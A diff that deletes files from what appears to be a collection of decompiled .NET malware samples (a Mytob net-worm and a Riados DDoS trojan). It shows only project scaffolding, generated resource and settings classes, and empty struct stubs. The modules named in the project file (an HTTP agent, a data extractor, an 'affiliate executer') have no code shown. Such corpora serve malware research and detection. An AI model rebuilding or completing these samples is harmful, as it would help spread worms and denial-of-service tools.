@ -1,49 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{1AFA68D1-A185-4528-B6C6-D993B3A4250A}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>WolfFt</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="HTTPAgent\DataExtractor.cs" />
<Compile Include="HTTPAgent\Agent.cs" />
<Compile Include="WolfFt\Properties\Settings.cs" />
<Compile Include="WolfFt\Properties\Resources.cs" />
<Compile Include="AffiliateExecuterNoWin\Program.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="WolfFt\Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/Net-Worm.Win32.Mytob.lnt.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WolfFt", "Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.csproj", "{1AFA68D1-A185-4528-B6C6-D993B3A4250A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1AFA68D1-A185-4528-B6C6-D993B3A4250A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{1AFA68D1-A185-4528-B6C6-D993B3A4250A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{1AFA68D1-A185-4528-B6C6-D993B3A4250A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{1AFA68D1-A185-4528-B6C6-D993B3A4250A}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

46
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/WolfFt/Properties/Resources.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: WolfFt.Properties.Resources
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace WolfFt.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) WolfFt.Properties.Resources.resourceMan, (object) null))
WolfFt.Properties.Resources.resourceMan = new ResourceManager("WolfFt.Properties.Resources", typeof (WolfFt.Properties.Resources).Assembly);
return WolfFt.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => WolfFt.Properties.Resources.resourceCulture;
set => WolfFt.Properties.Resources.resourceCulture = value;
}
}
}

120
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/WolfFt/Properties/Resources.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

21
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/WolfFt/Properties/Settings.cs
View File

@ -1,21 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: WolfFt.Properties.Settings
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace WolfFt.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x042bfd4b.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x042bfd4b
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 2, Pack = 1)]
internal struct \u0024ArrayType\u00240x042bfd4b
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x0a833ae0.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x0a833ae0
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 256, Pack = 1)]
internal struct \u0024ArrayType\u00240x0a833ae0
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x14f3579d.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x14f3579d
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
internal struct \u0024ArrayType\u00240x14f3579d
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x16b5e9c4.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x16b5e9c4
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 22, Pack = 1)]
internal struct \u0024ArrayType\u00240x16b5e9c4
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x1d30cc0a.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x1d30cc0a
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 3, Pack = 1)]
internal struct \u0024ArrayType\u00240x1d30cc0a
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x2f06ae88.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x2f06ae88
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 1, Pack = 1)]
internal struct \u0024ArrayType\u00240x2f06ae88
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x42a9f01b.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x42a9f01b
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 14, Pack = 1)]
internal struct \u0024ArrayType\u00240x42a9f01b
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x47e6e69e.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x47e6e69e
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 64, Pack = 1)]
internal struct \u0024ArrayType\u00240x47e6e69e
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x59f47f03.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x59f47f03
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 25, Pack = 1)]
internal struct \u0024ArrayType\u00240x59f47f03
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x5bb2c15a.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x5bb2c15a
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 15, Pack = 1)]
internal struct \u0024ArrayType\u00240x5bb2c15a
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x6a0077b6.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x6a0077b6
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 37, Pack = 1)]
internal struct \u0024ArrayType\u00240x6a0077b6
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0x7692bedb.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x7692bedb
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 1024, Pack = 1)]
internal struct \u0024ArrayType\u00240x7692bedb
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0xe4f4c4f0.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0xe4f4c4f0
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 65535, Pack = 1)]
internal struct \u0024ArrayType\u00240xe4f4c4f0
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0xe7df2480.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0xe7df2480
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 9, Pack = 1)]
internal struct \u0024ArrayType\u00240xe7df2480
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0xee1cbf17.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0xee1cbf17
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 18, Pack = 1)]
internal struct \u0024ArrayType\u00240xee1cbf17
{
}

14
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/$ArrayType$0xf541300f.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0xf541300f
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 29, Pack = 1)]
internal struct \u0024ArrayType\u00240xf541300f
{
}

5
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/AssemblyInfo.cs
View File

@ -1,5 +0,0 @@
using System.Reflection;
using System.Security.Permissions;
[assembly: AssemblyVersion("0.0.0.0")]
[assembly: PermissionSet(SecurityAction.RequestMinimum, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.SecurityPermission, mscorlib, Version=1.0.3300.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"SkipVerification\"/>\r\n</PermissionSet>\r\n")]

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/HINSTANCE__.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: HINSTANCE__
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4, Pack = 1)]
internal struct HINSTANCE__
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/HKEY__.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: HKEY__
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4, Pack = 1)]
internal struct HKEY__
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/HWND__.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: HWND__
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4, Pack = 1)]
internal struct HWND__
{
}

68
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/Trojan-DDoS.Win32.Riados.a.csproj
View File

@ -1,68 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F3427B8E-B6D1-45E1-A55D-75F725CCB91B}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>ARF</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
